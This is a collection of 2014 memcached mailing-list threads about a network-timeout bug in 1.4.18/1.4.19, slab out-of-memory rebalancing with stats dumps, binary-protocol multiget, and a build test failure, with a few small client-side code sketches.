event_add()'ed again until after the state is reset to 'init_state'. There was no code path for event_del to actually fail so far as I could see. I've e-mailed steven grimm for ideas but either that's not his e-mail anymore or he's not going to respond. I really don't know. I guess the old code would've just called conn_close again by accident... I don't see how the logic changed in any significant way in .18. Though again, if it happened with any frequency people's curr_conns stat would go negative. So... either that always happened and we never noticed, or your particular OS is corrupt. 
There're probably 10,000+ installs of .18+ now and only one complaint, so I'm a little hesitant to spend a ton of time on this until we get more reports. You should downgrade to .17.
Re: Issue 363 in memcached: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout
To that note, it *is* useful if you try that branch I posted, since so far as I can tell that should emulate the .17 behavior. On Thu, 8 May 2014, dormando wrote: I am just speculating, and by no means have any idea what I am really talking about here. :) With 2 threads, still solid, no timeouts, no runaway 100% cpu. Its been days. Increasing from 2 threads to 4 does not generate any more traffic or requests to memcached. Thus I am speculating perhaps it is a race-condition or some sort, only hitting with 2 threads. Doesn't tell me anything useful, since I'm already looking for potential races and don't see any possibility outside of libevent. Why do you say it will be less likely to happen with 2 threads than 4? Nature of race conditions: the more threads you have running the more likely you are to hit them, sometimes on order of magnitudes. It doesn't really change the fact that this has worked for many years and the code *barely* changed recently. I just don't see it. On Wednesday, May 7, 2014 5:38:47 PM UTC-7, Dormando wrote: That doesn't really tell us anything about the nature of the problem though. With 2 threads it might still happen, but is a lot less likely. On Wed, 7 May 2014, notifi...@commando.io wrote: Bumped up to 2 threads and so far no timeout errors. I'm going to let it run for a few more days, then revert back to 4 threads and see if timeout errors come up again. That will tell us the problem lies in spawning more than 2 threads. On Wednesday, May 7, 2014 5:19:13 PM UTC-7, Dormando wrote: Hey, try this branch: https://github.com/dormando/memcached/tree/double_close so far as I can tell that emulates the behavior in .17... to build: ./autogen.sh ./configure make run it in screen like you were doing with the other tests, see if it prints ERROR: Double Close [somefd]. If it prints that once then stops, I guess that's what .17 was doing... if it print spams, then something else may have changed. I'm mostly convinced something about your OS or build is corrupt, but I have no idea what it is. The only other thing I can think of is to instrument .17 a bit more and have you try that (with the connection code laid out the old way, but with a conn_closed flag to detect a double close attempt), and see if the old .17 still did it. On Tue, 6 May 2014, notifi...@commando.io wrote: Changing from 4 threads to 1 seems to have resolved the problem. No timeouts since. Should I set to 2 threads and wait and see how things go? On Tuesday, May 6, 2014 12:07:08 AM UTC-7, Dormando wrote: and how'd that work out? Still no other reports :/ a few thousand more downloads of .19... On Sun, 4 May 2014, notifi...@commando.io wrote: I'm going to try switching threads from 4 to 1. This host web2 is on the only one I am seeing it on, but it also is the only hosts that gets any real traffic. Super frustrating. On Sunday, May 4, 2014 10:12:08 AM UTC-7, Dormando wrote: I'm stumped. (also, your e-mails aren't updating the ticket...). It's impossible for a connection to get into the closed state without having event_del() and close() called on the socket. A socket slot isn't event_add()'ed again until after the state is reset to 'init_state'. There was no code path for event_del to actually fail so far as I could see. I've e-mailed steven grimm for ideas but either that's not his e-mail anymore or he's not going to respond. I really don't know. I guess the old code would've just called conn_close again by accident... I don't see how the logic changed in any significant way in .18. 
Though again, if it happened with any frequency people's curr_conns stat would go negative. So... either that always happened and we never noticed, or your particular OS is corrupt.
Re: MEMCACHED_SERVER_MEMORY_ALLOCATION_FAILURE (SERVER_ERROR out of memory storing object) error
Dormando,Yes, have to admit - we cache too aggressively (just do not want to use different less polite word :)). Going to do two test experiments: enable compression and auto reallocation. Before doing this: 1) why auto reallocation is not enabled by default, what issues/disadvantage to expect? Because it pulls memory from other places and evicts those items regardless of if they were still valid or expired. There's no way for it to reassign slab pages of just expired memory. Some people would prefer to just let evictions fall from the tail (least used) rather than do this, so we didn't change the defaults after introducing the feature. 2) why memcached does not have compression on server side if CPU is idle, because of ideology to keep it simple and fast? (just asking) I said already: in typical use case there are many more clients, and a very high rate of usage. If you flipped where the compression happens the server would run out of CPU very quickly, and be much more latent. We could support it in the server but it'd be a very low priority feature. On Tuesday, May 6, 2014 6:40:07 PM UTC-7, Dormando wrote: Hi Dormando, Full Slabs and Items stats are below. The problem is that other slabs are full too, so rebalancing is not trivial. I will try to create a wrapper that will do some analysis and do slab rebalancing based on stats (the idea to move try to shrink slabs with low eviction but need to think more). But i see there is Slabs Automove in protocol.txt. Do you recommend it? If it fits your needs. Otherwise, write an external daemon that controls the automover based on your own needs. You either need to add more memory to the total system or rebalance them. we run many-many memcached servers with 30Gb+ memory each box. And the problem occurs on some boxes periodically. So I am thinking how to convert manual restart to automatic action. I'm not sure why restarting will fix it, if above you say rebalancing is not trivial. If restarting would fix it, rebalancing would also fix it. From the stats below, you do have a fair amount of memory spread out among the higher order slab classes. Compression, or otherwise re-evaluating how you store those values may make a big difference. There's also a huge amount of stuff being evicted without ever being fetched again. Are you caching too aggressively, or is memory just way too small and they never get a chance to be fetched after being set? I'm just eyeballing it but evicted_time seems pretty short (a matter of hours). That's the last access time of the last object to be evicted... and it's like that across most of your slab classes. So, shuffle and compress and whatnot, but I think you're out of ram dude. 
server stats STAT pid 15480 STAT uptime 2476264 STAT time 1399422427 STAT version 1.4.15 STAT libevent 1.4.13-stable STAT pointer_size 64 STAT rusage_user 639012.117392 STAT rusage_system 2076810.323840 STAT curr_connections 5237 STAT total_connections 122995977 STAT connection_structures 23402 STAT reserved_fds 40 STAT cmd_get 91928675147 STAT cmd_set 4358475896 STAT cmd_flush 1 STAT cmd_touch 0 STAT get_hits 85005900667 STAT get_misses 6922774480 STAT delete_misses 4238049567 STAT delete_hits 885535057 STAT incr_misses 0 STAT incr_hits 0 STAT decr_misses 0 STAT decr_hits 0 STAT cas_misses 1074 STAT cas_hits 4784930 STAT cas_badval 14966 STAT touch_hits 0 STAT touch_misses 0 STAT auth_cmds 0 STAT auth_errors 0 STAT bytes_read 32317259718167 STAT bytes_written 221039272582722 STAT limit_maxbytes 25769803776 STAT accepting_conns 1 STAT listen_disabled_num 0 STAT threads 8 STAT conn_yields 0 STAT hash_power_level 25 STAT hash_bytes 268435456 STAT hash_is_expanding 0 STAT slab_reassign_running 0 STAT slabs_moved 0 STAT bytes 23567307974 STAT curr_items 32559669 STAT total_items 61290586 STAT expired_unfetched 6664504 STAT evicted_unfetched 1244432758 STAT evictions 2522683859 STAT reclaimed 7626148 END stats slabs STAT 1:chunk_size 96 STAT 1:chunks_per_page 10922 STAT 1:total_pages 1 STAT 1:total_chunks 10922 STAT 1:used_chunks 0 STAT 1:free_chunks 10922 STAT 1:free_chunks_end 0 STAT 1:mem_requested 0 STAT 1:get_hits 9905 STAT 1:cmd_set 10362 STAT 1:delete_hits 9582 STAT 1:incr_hits 0 STAT 1:decr_hits
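On the client-side compression point above: the switch really is in the client, not the server. A small sketch assuming the python-memcached client (other clients expose a similar knob); the key, value size and threshold below are made-up examples:

# Sketch of client-side compression; assumes the python-memcached client.
import memcache

mc = memcache.Client(["127.0.0.1:11211"])

big_value = "x" * 50000  # anything larger than min_compress_len gets compressed

# Values longer than min_compress_len bytes are zlib-compressed in the client
# before being sent; the server just stores the smaller blob.
mc.set("some:key", big_value, time=3600, min_compress_len=1024)

print(len(mc.get("some:key")))  # transparently decompressed on read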
Re: Issue 363 in memcached: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout
Hey, try this branch: https://github.com/dormando/memcached/tree/double_close so far as I can tell that emulates the behavior in .17... to build: ./autogen.sh ./configure make run it in screen like you were doing with the other tests, see if it prints ERROR: Double Close [somefd]. If it prints that once then stops, I guess that's what .17 was doing... if it print spams, then something else may have changed. I'm mostly convinced something about your OS or build is corrupt, but I have no idea what it is. The only other thing I can think of is to instrument .17 a bit more and have you try that (with the connection code laid out the old way, but with a conn_closed flag to detect a double close attempt), and see if the old .17 still did it. On Tue, 6 May 2014, notificati...@commando.io wrote: Changing from 4 threads to 1 seems to have resolved the problem. No timeouts since. Should I set to 2 threads and wait and see how things go? On Tuesday, May 6, 2014 12:07:08 AM UTC-7, Dormando wrote: and how'd that work out? Still no other reports :/ a few thousand more downloads of .19... On Sun, 4 May 2014, notifi...@commando.io wrote: I'm going to try switching threads from 4 to 1. This host web2 is on the only one I am seeing it on, but it also is the only hosts that gets any real traffic. Super frustrating. On Sunday, May 4, 2014 10:12:08 AM UTC-7, Dormando wrote: I'm stumped. (also, your e-mails aren't updating the ticket...). It's impossible for a connection to get into the closed state without having event_del() and close() called on the socket. A socket slot isn't event_add()'ed again until after the state is reset to 'init_state'. There was no code path for event_del to actually fail so far as I could see. I've e-mailed steven grimm for ideas but either that's not his e-mail anymore or he's not going to respond. I really don't know. I guess the old code would've just called conn_close again by accident... I don't see how the logic changed in any significant way in .18. Though again, if it happened with any frequency people's curr_conns stat would go negative. So... either that always happened and we never noticed, or your particular OS is corrupt. There're probably 10,000+ installs of .18+ now and only one complaint, so I'm a little hesitant to spend a ton of time on this until we get more reports. You should downgrade to .17. On Sun, 4 May 2014, notifi...@commando.io wrote: Damn it, got network timeout. CPU 3 is using 100% cpu from memcached. Here is the result of stat to verify using new version of memcached and libevent: STAT version 1.4.19 STAT libevent 2.0.18-stable On Saturday, May 3, 2014 11:55:31 PM UTC-7, notifi...@commando.io wrote: Just upgraded all 5 web-servers to memcached 1.4.19 with libevent 2.0.18. Will advise if I see memcached timeouts. Should be good though. Thanks so much for all the help and patience. Really appreciated. On Friday, May 2, 2014 10:20:26 PM UTC-7, memc...@googlecode.com wrote: Updates: Status: Invalid Comment #20 on issue 363 by dorma...@rydia.net: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout http://code.google.com/p/memcached/issues/detail?id=363 Any repeat crashes? I'm going to close this. it looks like remi shipped .19. reopen or open a new one if it hangs in the same way somehow... Well. 19 won't be printing anything, and it won't hang, but if it's actually our bug and not libevent it would end up spinning CPU. Keep an eye out I guess. 
Re: Multi-get implementation in binary protocol
Hello, For now, I'm trying to evaluate the performance of memcached server by using several client workloads. I have a question about multi-get implementation in binary protocol. As I know, in ascii protocol, we can send multiple keys in a single request packet to implement multi-get. But, in a binary protocol, it seems that we should send multiple request packets (one request packet per key) to implement multi-get. Even though we send multiple getQ, then sends get for the last key, we only can save the number of response packets only for cache miss. If I understand correctly, multi-get in binary protocol cannot reduce the number of request packets, and it also cannot reduce the number of response packets if hit-ratio is very high (like 99% get hit). If the performance bottleneck is on the network side not on the CPU, I think reducing the number of packets is still very important, but I don't understand why the binary protocol doesn't care about this. I missed something? you're right, it sucks. I was never happy with it, but haven't had time to add adjustments to the protocol for this. To note, with .19 some inefficiencies with the protocol were lifted, and most network cards are fast enough for most situations, even if it's one packet per response (and for large enough responses they split into multiple packets, anyway). The reason why this was done is for latency and streaming of responses: - In ascii multiget, I can send 10,000 keys, then I'm forced to wait for the server to look up all of the keys before sending its responses, this isn't typically very high but there's some latency to it. - In binary multiget, the responses are sent back as it receives them from the network more or less. This reduces the latency to when you start seeing responses, regardless of how large your multiget is. this is useful if you have a kind of client which can start processing responses in a streaming fashion. This potentially reduces the total time to render your response since you can keep the CPU busy unmarshalling responses instead of sleeping. However, it should have some tunables: One where it at least does one write per complete packet (TCP_CORK'ed, or similar), and one where it buffers up to some size. In my tests I can get ascii multiget up to 16.2 million keys/sec, but (with the fixes in .19) binprot caps out at 4.6m and is spending all of its time calling sendmsg(). Most people need far, far less than that, so the binprot as is should be okay though. The code isn't too friendly to this and there're other higher priority things I'd like to get done sooner. The relatively few number of people who do 500,000+ requests per second in binprot (they're almost always ascii at that scale) is the other reason. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
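For reference, the getQ/getKQ pattern discussed above looks roughly like this on the wire: one 24-byte request header per key (so the request side is not reduced), all batched into a single write, with a trailing noop whose response marks the end of the batch; misses stay silent. A minimal sketch, not a production client, and the host, port and keys are assumptions:

# Sketch of a binary-protocol multiget: one getKQ request per key plus a
# terminating noop, batched into a single write. Misses are silent; the
# noop response marks the end of the batch.
import socket
import struct

HEADER = struct.Struct(">BBHBBHIIQ")   # 24-byte binary protocol header
REQ_MAGIC, RES_MAGIC = 0x80, 0x81
OP_GETKQ, OP_NOOP = 0x0D, 0x0A

def recv_exact(s, n):
    buf = b""
    while len(buf) < n:
        chunk = s.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("server closed connection")
        buf += chunk
    return buf

def multiget(keys, host="127.0.0.1", port=11211):
    s = socket.create_connection((host, port))
    batch = b""
    for k in keys:
        kb = k.encode()
        batch += HEADER.pack(REQ_MAGIC, OP_GETKQ, len(kb), 0, 0, 0, len(kb), 0, 0) + kb
    batch += HEADER.pack(REQ_MAGIC, OP_NOOP, 0, 0, 0, 0, 0, 0, 0)
    s.sendall(batch)                   # one write for the whole batch

    results = {}
    while True:
        hdr = recv_exact(s, HEADER.size)
        magic, opcode, keylen, extlen, _, status, bodylen, _, _ = HEADER.unpack(hdr)
        body = recv_exact(s, bodylen)
        if opcode == OP_NOOP:          # end of the pipelined batch
            break
        if status == 0:                # hit: extras (flags), then key, then value
            key = body[extlen:extlen + keylen].decode()
            results[key] = body[extlen + keylen:]
    s.close()
    return results

if __name__ == "__main__":
    print(multiget(["foo", "bar", "baz"]))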
Re: Issue 363 in memcached: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout
That doesn't really tell us anything about the nature of the problem though. With 2 threads it might still happen, but is a lot less likely. On Wed, 7 May 2014, notificati...@commando.io wrote: Bumped up to 2 threads and so far no timeout errors. I'm going to let it run for a few more days, then revert back to 4 threads and see if timeout errors come up again. That will tell us the problem lies in spawning more than 2 threads. On Wednesday, May 7, 2014 5:19:13 PM UTC-7, Dormando wrote: Hey, try this branch: https://github.com/dormando/memcached/tree/double_close so far as I can tell that emulates the behavior in .17... to build: ./autogen.sh ./configure make run it in screen like you were doing with the other tests, see if it prints ERROR: Double Close [somefd]. If it prints that once then stops, I guess that's what .17 was doing... if it print spams, then something else may have changed. I'm mostly convinced something about your OS or build is corrupt, but I have no idea what it is. The only other thing I can think of is to instrument .17 a bit more and have you try that (with the connection code laid out the old way, but with a conn_closed flag to detect a double close attempt), and see if the old .17 still did it. On Tue, 6 May 2014, notifi...@commando.io wrote: Changing from 4 threads to 1 seems to have resolved the problem. No timeouts since. Should I set to 2 threads and wait and see how things go? On Tuesday, May 6, 2014 12:07:08 AM UTC-7, Dormando wrote: and how'd that work out? Still no other reports :/ a few thousand more downloads of .19... On Sun, 4 May 2014, notifi...@commando.io wrote: I'm going to try switching threads from 4 to 1. This host web2 is on the only one I am seeing it on, but it also is the only hosts that gets any real traffic. Super frustrating. On Sunday, May 4, 2014 10:12:08 AM UTC-7, Dormando wrote: I'm stumped. (also, your e-mails aren't updating the ticket...). It's impossible for a connection to get into the closed state without having event_del() and close() called on the socket. A socket slot isn't event_add()'ed again until after the state is reset to 'init_state'. There was no code path for event_del to actually fail so far as I could see. I've e-mailed steven grimm for ideas but either that's not his e-mail anymore or he's not going to respond. I really don't know. I guess the old code would've just called conn_close again by accident... I don't see how the logic changed in any significant way in .18. Though again, if it happened with any frequency people's curr_conns stat would go negative. So... either that always happened and we never noticed, or your particular OS is corrupt. There're probably 10,000+ installs of .18+ now and only one complaint, so I'm a little hesitant to spend a ton of time on this until we get more reports. You should downgrade to .17. On Sun, 4 May 2014, notifi...@commando.io wrote: Damn it, got network timeout. CPU 3 is using 100% cpu from memcached. Here is the result of stat to verify using new version of memcached and libevent: STAT version 1.4.19 STAT libevent 2.0.18-stable On Saturday, May 3, 2014 11:55:31 PM UTC-7, notifi...@commando.io wrote: Just upgraded all 5 web-servers to memcached 1.4.19 with libevent 2.0.18. Will advise if I see memcached timeouts. Should be good though. Thanks so much for all the help and patience. Really appreciated. 
On Friday, May 2, 2014 10:20:26 PM UTC-7, memc...@googlecode.com wrote: Updates: Status: Invalid Comment #20 on issue 363 by dorma...@rydia.net: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout
Re: Issue 363 in memcached: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout
and how'd that work out? Still no other reports :/ a few thousand more downloads of .19... On Sun, 4 May 2014, notificati...@commando.io wrote: I'm going to try switching threads from 4 to 1. This host web2 is on the only one I am seeing it on, but it also is the only hosts that gets any real traffic. Super frustrating. On Sunday, May 4, 2014 10:12:08 AM UTC-7, Dormando wrote: I'm stumped. (also, your e-mails aren't updating the ticket...). It's impossible for a connection to get into the closed state without having event_del() and close() called on the socket. A socket slot isn't event_add()'ed again until after the state is reset to 'init_state'. There was no code path for event_del to actually fail so far as I could see. I've e-mailed steven grimm for ideas but either that's not his e-mail anymore or he's not going to respond. I really don't know. I guess the old code would've just called conn_close again by accident... I don't see how the logic changed in any significant way in .18. Though again, if it happened with any frequency people's curr_conns stat would go negative. So... either that always happened and we never noticed, or your particular OS is corrupt. There're probably 10,000+ installs of .18+ now and only one complaint, so I'm a little hesitant to spend a ton of time on this until we get more reports. You should downgrade to .17. On Sun, 4 May 2014, notifi...@commando.io wrote: Damn it, got network timeout. CPU 3 is using 100% cpu from memcached. Here is the result of stat to verify using new version of memcached and libevent: STAT version 1.4.19 STAT libevent 2.0.18-stable On Saturday, May 3, 2014 11:55:31 PM UTC-7, notifi...@commando.io wrote: Just upgraded all 5 web-servers to memcached 1.4.19 with libevent 2.0.18. Will advise if I see memcached timeouts. Should be good though. Thanks so much for all the help and patience. Really appreciated. On Friday, May 2, 2014 10:20:26 PM UTC-7, memc...@googlecode.com wrote: Updates: Status: Invalid Comment #20 on issue 363 by dorma...@rydia.net: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout http://code.google.com/p/memcached/issues/detail?id=363 Any repeat crashes? I'm going to close this. it looks like remi shipped .19. reopen or open a new one if it hangs in the same way somehow... Well. 19 won't be printing anything, and it won't hang, but if it's actually our bug and not libevent it would end up spinning CPU. Keep an eye out I guess. -- You received this message because this project is configured to send all issue notifications to this address. You may adjust your notification preferences at: https://code.google.com/hosting/settings -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: MEMCACHED_SERVER_MEMORY_ALLOCATION_FAILURE (SERVER_ERROR out of memory storing object) error
Hi, Does anybody know good way to handle OOM during set operation? Server is fully calcified :) (no new pages to allocate) and i have this issue for slab 17 STAT items:17:number 16128 STAT items:17:age 90 STAT items:17:evicted 246790897 STAT items:17:evicted_nonzero 246790874 STAT items:17:evicted_time 90 STAT items:17:outofmemory 33098 STAT items:17:tailrepairs 0 STAT items:17:reclaimed 1183 STAT items:17:expired_unfetched 196 STAT items:17:evicted_unfetched 143699820 running memcached : STAT version 1.4.15 stats slabs ? Is memory unbalanced from other slabs? nothing except reboot periodically comes to my mind but this solution does not make me happy :) There's the slab rebalance feature. OOM errors only happen when there is truly very few pages free and all of the ones in the tail are locked, or there's a bug. It should always evict. The rebalance feature is documented in doc/protocol.txt. However your eviction seems to be very highly pressured. The evicted_unfetched stat is high compared to the tota number of evictions. So they're not even staying in long enough to get fetched again. There aren't that many OOM errors overall, so perhaps you are just hitting that slab way too hard and occasionally locking everything in the tail. You either need to add more memory to the total system or rebalance them. other option - enable compression to allow more items but need to experiment (why memcached does not provide server side compression? as i see in stats memcached cpu is not used, so would be good to utilize it.) Very high rate of access is expected and the ratio of clients to servers might be high, so compression is done in the client instead. It was also designed to let you run it wherever there's free memory (extra installed in webservers/etc) so it wants to avoid excess cpu usage. It's a trivial switch either way. Also consider upgrading to .17 or .19. might be some good fixes. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
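For completeness, the rebalance feature mentioned above is driven by plain text commands (see doc/protocol.txt), and the server typically needs to be started with -o slab_reassign for them to do anything. A minimal sketch of poking them by hand; the host, port and the source/destination class numbers are made-up examples:

# Sketch of driving the slab rebalancer by hand, per doc/protocol.txt.
# Requires the server to be started with -o slab_reassign (and optionally
# slab_automove). Host/port and class numbers below are assumptions.
import socket

def send_command(cmd, host="127.0.0.1", port=11211):
    s = socket.create_connection((host, port), timeout=5)
    s.sendall((cmd + "\r\n").encode())
    reply = s.recv(1024).decode(errors="replace").strip()
    s.close()
    return reply

# Let the built-in automover shuffle pages on its own...
print(send_command("slabs automove 1"))

# ...or move one page manually, e.g. from class 4 (idle memory)
# to class 17 (the class seeing the OOM/eviction pressure above).
print(send_command("slabs reassign 4 17"))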
Re: MEMCACHED_SERVER_MEMORY_ALLOCATION_FAILURE (SERVER_ERROR out of memory storing object) error
Hi Dormando, Full Slabs and Items stats are below. The problem is that other slabs are full too, so rebalancing is not trivial. I will try to create a wrapper that will do some analysis and do slab rebalancing based on stats (the idea to move try to shrink slabs with low eviction but need to think more). But i see there is Slabs Automove in protocol.txt. Do you recommend it? If it fits your needs. Otherwise, write an external daemon that controls the automover based on your own needs. You either need to add more memory to the total system or rebalance them. we run many-many memcached servers with 30Gb+ memory each box. And the problem occurs on some boxes periodically. So I am thinking how to convert manual restart to automatic action. I'm not sure why restarting will fix it, if above you say rebalancing is not trivial. If restarting would fix it, rebalancing would also fix it. From the stats below, you do have a fair amount of memory spread out among the higher order slab classes. Compression, or otherwise re-evaluating how you store those values may make a big difference. There's also a huge amount of stuff being evicted without ever being fetched again. Are you caching too aggressively, or is memory just way too small and they never get a chance to be fetched after being set? I'm just eyeballing it but evicted_time seems pretty short (a matter of hours). That's the last access time of the last object to be evicted... and it's like that across most of your slab classes. So, shuffle and compress and whatnot, but I think you're out of ram dude. server stats STAT pid 15480 STAT uptime 2476264 STAT time 1399422427 STAT version 1.4.15 STAT libevent 1.4.13-stable STAT pointer_size 64 STAT rusage_user 639012.117392 STAT rusage_system 2076810.323840 STAT curr_connections 5237 STAT total_connections 122995977 STAT connection_structures 23402 STAT reserved_fds 40 STAT cmd_get 91928675147 STAT cmd_set 4358475896 STAT cmd_flush 1 STAT cmd_touch 0 STAT get_hits 85005900667 STAT get_misses 6922774480 STAT delete_misses 4238049567 STAT delete_hits 885535057 STAT incr_misses 0 STAT incr_hits 0 STAT decr_misses 0 STAT decr_hits 0 STAT cas_misses 1074 STAT cas_hits 4784930 STAT cas_badval 14966 STAT touch_hits 0 STAT touch_misses 0 STAT auth_cmds 0 STAT auth_errors 0 STAT bytes_read 32317259718167 STAT bytes_written 221039272582722 STAT limit_maxbytes 25769803776 STAT accepting_conns 1 STAT listen_disabled_num 0 STAT threads 8 STAT conn_yields 0 STAT hash_power_level 25 STAT hash_bytes 268435456 STAT hash_is_expanding 0 STAT slab_reassign_running 0 STAT slabs_moved 0 STAT bytes 23567307974 STAT curr_items 32559669 STAT total_items 61290586 STAT expired_unfetched 6664504 STAT evicted_unfetched 1244432758 STAT evictions 2522683859 STAT reclaimed 7626148 END stats slabs STAT 1:chunk_size 96 STAT 1:chunks_per_page 10922 STAT 1:total_pages 1 STAT 1:total_chunks 10922 STAT 1:used_chunks 0 STAT 1:free_chunks 10922 STAT 1:free_chunks_end 0 STAT 1:mem_requested 0 STAT 1:get_hits 9905 STAT 1:cmd_set 10362 STAT 1:delete_hits 9582 STAT 1:incr_hits 0 STAT 1:decr_hits 0 STAT 1:cas_hits 0 STAT 1:cas_badval 0 STAT 1:touch_hits 0 STAT 2:chunk_size 120 STAT 2:chunks_per_page 8738 STAT 2:total_pages 1 STAT 2:total_chunks 8738 STAT 2:used_chunks 13 STAT 2:free_chunks 8725 STAT 2:free_chunks_end 0 STAT 2:mem_requested 1350 STAT 2:get_hits 1309125 STAT 2:cmd_set 2963710 STAT 2:delete_hits 199018 STAT 2:incr_hits 0 STAT 2:decr_hits 0 STAT 2:cas_hits 770681 STAT 2:cas_badval 3697 STAT 2:touch_hits 0 STAT 3:chunk_size 152 STAT 
3:chunks_per_page 6898 STAT 3:total_pages 5 STAT 3:total_chunks 34490 STAT 3:used_chunks 34240 STAT 3:free_chunks 250 STAT 3:free_chunks_end 0 STAT 3:mem_requested 483 STAT 3:get_hits 2088979 STAT 3:cmd_set 4355223 STAT 3:delete_hits 3392 STAT 3:incr_hits 0 STAT 3:decr_hits 0 STAT 3:cas_hits 0 STAT 3:cas_badval 0 STAT 3:touch_hits 0 STAT 4:chunk_size 192 STAT 4:chunks_per_page 5461 STAT 4:total_pages 11 STAT 4:total_chunks 60071 STAT 4:used_chunks 60070 STAT 4:free_chunks 1 STAT 4:free_chunks_end 0 STAT 4:mem_requested 10821971 STAT 4:get_hits 65413752 STAT 4:cmd_set 22935889 STAT 4:delete_hits 6028 STAT 4:incr_hits 0 STAT 4:decr_hits 0 STAT 4:cas_hits 0 STAT 4:cas_badval 0 STAT 4:touch_hits 0 STAT 5:chunk_size 240 STAT 5:chunks_per_page 4369 STAT 5:total_pages 756 STAT 5:total_chunks 3302964 STAT 5:used_chunks 3302964 STAT 5:free_chunks 0 STAT 5:free_chunks_end 0 STAT 5:mem_requested 766866823 STAT 5:get_hits 2762768607 STAT 5:cmd_set 445418784 STAT 5:delete_hits 15806705 STAT 5:incr_hits 0 STAT 5:decr_hits 0 STAT 5:cas_hits 0 STAT 5:cas_badval 0 STAT 5:touch_hits 0 STAT 6:chunk_size 304 STAT 6:chunks_per_page 3449 STAT 6:total_pages 2304 STAT 6:total_chunks 7946496 STAT 6:used_chunks 7946496 STAT 6:free_chunks 0 STAT 6:free_chunks_end 0 STAT 6
Re: Issue 363 in memcached: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout
I'm stumped. (also, your e-mails aren't updating the ticket...). It's impossible for a connection to get into the closed state without having event_del() and close() called on the socket. A socket slot isn't event_add()'ed again until after the state is reset to 'init_state'. There was no code path for event_del to actually fail so far as I could see. I've e-mailed steven grimm for ideas but either that's not his e-mail anymore or he's not going to respond. I really don't know. I guess the old code would've just called conn_close again by accident... I don't see how the logic changed in any significant way in .18. Though again, if it happened with any frequency people's curr_conns stat would go negative. So... either that always happened and we never noticed, or your particular OS is corrupt. There're probably 10,000+ installs of .18+ now and only one complaint, so I'm a little hesitant to spend a ton of time on this until we get more reports. You should downgrade to .17. On Sun, 4 May 2014, notificati...@commando.io wrote: Damn it, got network timeout. CPU 3 is using 100% cpu from memcached. Here is the result of stat to verify using new version of memcached and libevent: STAT version 1.4.19 STAT libevent 2.0.18-stable On Saturday, May 3, 2014 11:55:31 PM UTC-7, notifi...@commando.io wrote: Just upgraded all 5 web-servers to memcached 1.4.19 with libevent 2.0.18. Will advise if I see memcached timeouts. Should be good though. Thanks so much for all the help and patience. Really appreciated. On Friday, May 2, 2014 10:20:26 PM UTC-7, memc...@googlecode.com wrote: Updates: Status: Invalid Comment #20 on issue 363 by dorma...@rydia.net: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout http://code.google.com/p/memcached/issues/detail?id=363 Any repeat crashes? I'm going to close this. it looks like remi shipped .19. reopen or open a new one if it hangs in the same way somehow... Well. 19 won't be printing anything, and it won't hang, but if it's actually our bug and not libevent it would end up spinning CPU. Keep an eye out I guess. -- You received this message because this project is configured to send all issue notifications to this address. You may adjust your notification preferences at: https://code.google.com/hosting/settings -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
1.4.19
http://code.google.com/p/memcached/wiki/ReleaseNotes1419 Thanks to everyone who helped out with the bugfixes for this release. Don't want to get my hopes up but I think we're finally running out of segfaults and refcount leaks (until we go changing more stuff again..). -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: Memcached 1.4.19 Build Not Working - Compiling from Source
What's the output of: $ prove -v t/lru-crawler.t How long are the tests taking to run? This has definitely been tested on ubuntu 12.04 (which is what I assume you meant?), but not something with so little RAM. On Thu, 1 May 2014, Wilfred Khalik wrote: Hi guys, I get the below failure error when I run the make test command: Any help would be appreciated.I am running this on 512MB Digital Ocean VPS by the way on Linux 12.0.4.4 LTS. Slab Stats 64 Thread stats 200 Global stats 208 Settings 124 Item (no cas) 32 Item (cas) 40 Libevent thread 100 Connection 340 libevent thread cumulative 13100 Thread stats cumulative 13000 ./testapp 1..48 ok 1 - cache_create ok 2 - cache_constructor ok 3 - cache_constructor_fail ok 4 - cache_destructor ok 5 - cache_reuse ok 6 - cache_redzone ok 7 - issue_161 ok 8 - strtol ok 9 - strtoll ok 10 - strtoul ok 11 - strtoull ok 12 - issue_44 ok 13 - vperror ok 14 - issue_101 ok 15 - start_server ok 16 - issue_92 ok 17 - issue_102 ok 18 - binary_noop ok 19 - binary_quit ok 20 - binary_quitq ok 21 - binary_set ok 22 - binary_setq ok 23 - binary_add ok 24 - binary_addq ok 25 - binary_replace ok 26 - binary_replaceq ok 27 - binary_delete ok 28 - binary_deleteq ok 29 - binary_get ok 30 - binary_getq ok 31 - binary_getk ok 32 - binary_getkq ok 33 - binary_incr ok 34 - binary_incrq ok 35 - 